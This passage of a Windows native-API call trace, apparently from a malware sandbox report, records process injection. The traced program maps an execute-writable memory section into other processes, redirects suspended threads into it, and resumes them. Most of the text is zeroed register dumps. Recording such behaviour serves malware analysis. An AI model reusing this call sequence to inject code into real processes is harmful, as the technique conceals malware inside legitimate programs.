AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0138.885] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x193200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x194000) returned 0x0 [0138.919] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x193200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2a70000, SectionOffset=0x0, ViewSize=0xde6e8*=0x194000) returned 0x0 [0138.967] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0138.979] NtClose (Handle=0x1a8) returned 0x0 [0138.980] NtSetContextThread (ThreadHandle=0x1a0, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x25e000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x2b70717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0138.985] NtResumeThread (in: ThreadHandle=0x1a0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0138.985] NtClose (Handle=0x1a4) returned 0x0 [0138.986] NtClose (Handle=0x1a0) returned 0x0 [0138.986] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x1174, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a0) returned 0x0 [0138.986] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0138.987] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0138.987] NtReadVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x3c8000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0138.987] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0139.020] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1178) | out: ThreadHandle=0xdea64*=0x1a4) returned 0x0 [0139.020] NtSuspendThread (in: ThreadHandle=0x1a4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0139.020] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a0, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2260000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0139.045] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x3c8000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.050] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0139.050] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x102200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x103000) returned 0x0 [0139.077] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x102200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2090000, SectionOffset=0x0, ViewSize=0xde6e8*=0x103000) returned 0x0 [0139.101] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0139.109] NtClose (Handle=0x1a8) returned 0x0 [0139.109] NtSetContextThread (ThreadHandle=0x1a4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x3c8000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x20ff717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, 